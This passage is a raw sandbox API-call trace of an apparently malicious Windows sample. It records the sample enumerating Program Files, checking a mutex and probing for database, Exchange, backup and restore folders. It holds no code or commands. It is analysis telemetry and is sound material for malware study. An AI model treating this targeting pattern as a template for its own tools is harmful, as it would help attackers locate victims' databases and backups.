nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player", cAlternateFileName="WI54FB~1")) returned 1 [0104.206] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdcdcc500, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdcdcc500, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows NT", cAlternateFileName="WINDOW~2")) returned 1 [0104.206] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Photo Viewer", cAlternateFileName="WINDOW~4")) returned 1 [0104.206] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdde75f00, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdde75f00, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Portable Devices", cAlternateFileName="WIBFE5~1")) returned 1 [0104.206] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xddf345e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xddf345e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WI4223~1")) returned 1 [0104.206] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xddf345e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xddf345e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WI4223~1")) returned 0 [0104.206] GetLastError () returned 0x12 [0104.206] FindClose (in: hFindFile=0x577e78 | out: hFindFile=0x577e78) returned 1 [0104.207] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.207] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.207] GlobalUnlock (hMem=0x45000c) returned 0 [0104.207] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.207] GlobalLock (hMem=0x450004) returned 0x58a010 [0104.207] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.207] GlobalUnlock (hMem=0x45000c) returned 0 [0104.207] GlobalHandle (pMem=0x58a010) returned 0x450004 [0104.207] GlobalUnlock (hMem=0x450004) returned 0 [0104.207] FindFirstFileW (in: lpFileName="C:\\Program Files\\*.*", lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe61d3d20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe61d3d20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x577e78 [0104.207] FileTimeToLocalFileTime (in: lpFileTime=0x18f878, lpLocalFileTime=0x18f788 | out: lpLocalFileTime=0x18f788) returned 1 [0104.207] FileTimeToDosDateTime (in: lpFileTime=0x18f788, lpFatDate=0x18f846, lpFatTime=0x18f844 | out: lpFatDate=0x18f846, lpFatTime=0x18f844) returned 1 [0104.207] GlobalLock (hMem=0x450004) returned 0x588000 [0104.207] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.207] GlobalUnlock (hMem=0x450004) returned 0 [0104.207] GlobalLock (hMem=0x450004) returned 0x588000 [0104.208] GlobalLock (hMem=0x45000c) returned 0x58a010 [0104.208] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.208] GlobalUnlock (hMem=0x450004) returned 0 [0104.208] GlobalHandle (pMem=0x58a010) returned 0x45000c [0104.208] GlobalUnlock (hMem=0x45000c) returned 0 [0104.208] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.208] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe61d3d20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe61d3d20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.208] FileTimeToLocalFileTime (in: lpFileTime=0x18f878, lpLocalFileTime=0x18f784 | out: lpLocalFileTime=0x18f784) returned 1 [0104.208] FileTimeToDosDateTime (in: lpFileTime=0x18f784, lpFatDate=0x18f846, lpFatTime=0x18f844 | out: lpFatDate=0x18f846, lpFatTime=0x18f844) returned 1 [0104.208] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.208] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.208] GlobalUnlock (hMem=0x45000c) returned 0 [0104.208] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.208] GlobalLock (hMem=0x450004) returned 0x58a010 [0104.208] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.208] GlobalUnlock (hMem=0x45000c) returned 0 [0104.208] GlobalHandle (pMem=0x58a010) returned 0x450004 [0104.208] GlobalUnlock (hMem=0x450004) returned 0 [0104.209] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.209] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdddb7820, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdddb7820, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 1 [0104.209] FileTimeToLocalFileTime (in: lpFileTime=0x18f878, lpLocalFileTime=0x18f784 | out: lpLocalFileTime=0x18f784) returned 1 [0104.209] FileTimeToDosDateTime (in: lpFileTime=0x18f784, lpFatDate=0x18f846, lpFatTime=0x18f844 | out: lpFatDate=0x18f846, lpFatTime=0x18f844) returned 1 [0104.209] GlobalLock (hMem=0x450004) returned 0x588000 [0104.209] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.209] GlobalUnlock (hMem=0x450004) returned 0 [0104.209] GlobalLock (hMem=0x450004) returned 0x588000 [0104.209] GlobalLock (hMem=0x45000c) returned 0x58a010 [0104.209] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.209] GlobalUnlock (hMem=0x450004) returned 0 [0104.209] GlobalHandle (pMem=0x58a010) returned 0x45000c [0104.209] GlobalUnlock (hMem=0x45000c) returned 0 [0104.209] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.209] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.209] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.209] GlobalUnlock (hMem=0x45000c) returned 0 [0104.209] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.210] GlobalLock (hMem=0x450004) returned 0x58a010 [0104.210] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.210] GlobalUnlock (hMem=0x45000c) returned 0 [0104.210] GlobalHandle (pMem=0x58a010) returned 0x450004 [0104.210] GlobalUnlock (hMem=0x450004) returned 0 [0104.210] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.210] SysReAllocStringLen (in: pbstr=0x18f784*=0x0, psz="C:\\Program Files\\Common Files", len=0x1d | out: pbstr=0x18f784*="C:\\Program Files\\Common Files") returned 1 [0104.210] GlobalLock (hMem=0x450004) returned 0x588000 [0104.210] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.210] GlobalUnlock (hMem=0x450004) returned 0 [0104.210] GlobalLock (hMem=0x450004) returned 0x588000 [0104.210] GlobalLock (hMem=0x45000c) returned 0x58a010 [0104.210] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.210] GlobalUnlock (hMem=0x450004) returned 0 [0104.210] GlobalHandle (pMem=0x58a010) returned 0x45000c [0104.210] GlobalUnlock (hMem=0x45000c) returned 0 [0104.211] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft\\Exchange Server", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0x18f148, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x18f2d8, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x132765, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x77c73ca3, nFileSizeHigh=0x77c73cce, nFileSizeLow=0x1ff8, dwReserved0=0x2000, dwReserved1=0x587ffa, cFileName="翸X耀\x07硐U\r", cAlternateFileName="䱈@肄X聘X企@\x18㼔V\x18\x1b")) returned 0xffffffff [0104.211] GetLastError () returned 0x3 [0104.211] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.211] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d270, cbMultiByte=26, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="microsoft\\exchange server\\\x1b") returned 26 [0104.211] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=21, lpWideCharStr=0x18e44c, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server\\rver\\") returned 21 [0104.211] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft SQL Server", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0x18f148, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x18f2d8, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x132765, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x77c73ca3, nFileSizeHigh=0x77c73cce, nFileSizeLow=0x1ff8, dwReserved0=0x2000, dwReserved1=0x587ffa, cFileName="翸X耀\x07硐U\r", cAlternateFileName="żW䱠@耜X企@\x18㽜V\x181")) returned 0xffffffff [0104.212] GetLastError () returned 0x2 [0104.212] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.212] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d270, cbMultiByte=21, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server\\\x18\x15") returned 21 [0104.212] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=9, lpWideCharStr=0x18e44c, cchWideChar=2047 | out: lpWideCharStr="Firebird\\ SQL Server\\rver\\") returned 9 [0104.212] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Firebird", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0x18f148, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x18f2d8, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x132765, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x77c73ca3, nFileSizeHigh=0x77c73cce, nFileSizeLow=0x1ff8, dwReserved0=0x2000, dwReserved1=0x587ffa, cFileName="翸X耀\x07硐U\r", cAlternateFileName="żW䱠@脬X企@\x18㟬X\x18;")) returned 0xffffffff [0104.212] GetLastError () returned 0x2 [0104.213] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.213] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=9, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="firebird\\") returned 9 [0104.213] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=8, lpWideCharStr=0x18e44c, cchWideChar=2047 | out: lpWideCharStr="MSSQL.1\\\\ SQL Server\\rver\\") returned 8 [0104.213] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\MSSQL.1", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0x18f148, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x18f2d8, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x132765, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x77c73ca3, nFileSizeHigh=0x77c73cce, nFileSizeLow=0x1ff8, dwReserved0=0x2000, dwReserved1=0x587ffa, cFileName="翸X耀\x07硐U\r", cAlternateFileName="żW䱠@肤X企@\x18㤄X\x18D")) returned 0xffffffff [0104.213] GetLastError () returned 0x2 [0104.215] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.215] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=8, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="mssql.1\\\x10") returned 8 [0104.216] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=37, lpWideCharStr=0x18e44c, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server Compact Edition\\") returned 37 [0104.216] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft SQL Server Compact Edition", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0x18f148, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x18f2d8, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x132765, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x77c73ca3, nFileSizeHigh=0x77c73cce, nFileSizeLow=0x1ff8, dwReserved0=0x2000, dwReserved1=0x587ffa, cFileName="翸X耀\x07硐U\r", cAlternateFileName="żW䱠@耜X企@\x18脬X\x18j")) returned 0xffffffff [0104.216] GetLastError () returned 0x2 [0104.216] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.216] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=37, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server compact edition\\icrosoft SQL Server Compact Edition\\") returned 37 [0104.216] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18e44c, cchWideChar=2047 | out: lpWideCharStr="Adobe\\oft SQL Server Compact Edition\\") returned 6 [0104.217] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Adobe", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0x18f148, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x18f2d8, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x132765, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x77c73ca3, nFileSizeHigh=0x77c73cce, nFileSizeLow=0x1ff8, dwReserved0=0x2000, dwReserved1=0x587ffa, cFileName="翸X耀\x07硐U\r", cAlternateFileName="żW䱠@紌X企@\x18㟬X\x18q")) returned 0xffffffff [0104.217] GetLastError () returned 0x2 [0104.217] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.217] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=6, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="adobe\\脨X\x80") returned 6 [0104.217] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18e44c, cchWideChar=2047 | out: lpWideCharStr="Oracle\\ft SQL Server Compact Edition\\") returned 7 [0104.218] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Oracle", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0x18f148, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x18f2d8, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x132765, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x77c73ca3, nFileSizeHigh=0x77c73cce, nFileSizeLow=0x1ff8, dwReserved0=0x2000, dwReserved1=0x587ffa, cFileName="翸X耀\x07硐U\r", cAlternateFileName="żW䱠@㊼W企@\x18㤄X\x18y")) returned 0xffffffff [0104.218] GetLastError () returned 0x2 [0104.218] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.218] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=7, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="oracle\\X\x10") returned 7 [0104.218] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18e44c, cchWideChar=2047 | out: lpWideCharStr="Archiveft SQL Server Compact Edition\\") returned 7 [0104.218] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Archive", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0x18f148, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x18f2d8, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x132765, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x77c73ca3, nFileSizeHigh=0x77c73cce, nFileSizeLow=0x1ff8, dwReserved0=0x2000, dwReserved1=0x587ffa, cFileName="翸X耀\x07硐U\r", cAlternateFileName="żW䱠@肤X企@\x18㟬X\x18\x81")) returned 0xffffffff [0104.218] GetLastError () returned 0x2 [0104.219] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.219] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=7, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="archiveX\x10") returned 7 [0104.219] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18e44c, cchWideChar=2047 | out: lpWideCharStr="Backupeft SQL Server Compact Edition\\") returned 6 [0104.219] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Backup", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0x18f148, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x18f2d8, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x132765, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x77c73ca3, nFileSizeHigh=0x77c73cce, nFileSizeLow=0x1ff8, dwReserved0=0x2000, dwReserved1=0x587ffa, cFileName="翸X耀\x07硐U\r", cAlternateFileName="żW䱠@紌X企@\x18㤄X\x18\x88")) returned 0xffffffff [0104.219] GetLastError () returned 0x2 [0104.219] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.219] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=6, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="backup㟨X\x10") returned 6 [0104.220] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18e44c, cchWideChar=2047 | out: lpWideCharStr="Reserveft SQL Server Compact Edition\\") returned 6 [0104.220] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Reserv", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0x18f148, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x18f2d8, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x132765, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x77c73ca3, nFileSizeHigh=0x77c73cce, nFileSizeLow=0x1ff8, dwReserved0=0x2000, dwReserved1=0x587ffa, cFileName="翸X耀\x07硐U\r", cAlternateFileName="żW䱠@㊼W企@\x18㟬X\x18\x8f")) returned 0xffffffff [0104.220] GetLastError () returned 0x2 [0104.220] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.220] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=6, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="reserv㤀X\x10") returned 6 [0104.220] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18e44c, cchWideChar=2047 | out: lpWideCharStr="Restoreft SQL Server Compact Edition\\") returned 7 [0104.221] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Restore", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0x18f148, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x18f2d8, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x132765, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x77c73ca3, nFileSizeHigh=0x77c73cce, nFileSizeLow=0x1ff8, dwReserved0=0x2000, dwReserved1=0x587ffa, cFileName="翸X耀\x07硐U\r", cAlternateFileName="żW䱠@肤X企@\x18㤄X\x18\x97")) returned 0xffffffff [0104.221] GetLastError () returned 0x2 [0104.221] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.221] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=7, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="restoreX\x10") returned 7 [0104.221] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.221] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.221] GlobalUnlock (hMem=0x45000c) returned 0 [0104.221] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.221] GlobalLock (hMem=0x450004) returned 0x58c010 [0104.221] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.221] GlobalUnlock (hMem=0x45000c) returned 0 [0104.222] GlobalHandle (pMem=0x58c010) returned 0x450004 [0104.222] GlobalUnlock (hMem=0x450004) returned 0 [0104.222] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.222] GetEnvironmentVariableA (in: lpName="ALLUSERSPROFILE", lpBuffer=0x18effc, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0104.222] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aa28, cbMultiByte=15, lpWideCharStr=0x18e3fc, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\") returned 15 [0104.222] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.222] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x18effc, nSize=0x400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0104.222] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e79fe8, cbMultiByte=46, lpWideCharStr=0x18e3fc, cchWideChar=2047 | out: lpWideCharStr="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 46 [0104.222] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.222] GetEnvironmentVariableA (in: lpName="ProgramData", lpBuffer=0x18effc, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0104.223] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aa48, cbMultiByte=15, lpWideCharStr=0x18e3fc, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 15 [0104.223] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.223] GetEnvironmentVariableA (in: lpName="WINDIR", lpBuffer=0x18effc, nSize=0x400 | out: lpBuffer="C:\\Windows") returned 0xa [0104.223] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9480, cbMultiByte=11, lpWideCharStr=0x18e3fc, cchWideChar=2047 | out: lpWideCharStr="c:\\windows\\ata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 11 [0104.223] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.223] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.223] GlobalUnlock (hMem=0x450004) returned 0 [0104.223] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.223] GlobalLock (hMem=0x45000c) returned 0x58c010 [0104.223] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.223] GlobalUnlock (hMem=0x450004) returned 0 [0104.223] GlobalHandle (pMem=0x58c010) returned 0x45000c [0104.223] GlobalUnlock (hMem=0x45000c) returned 0 [0104.224] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.224] MultiByteToWideChar (in: 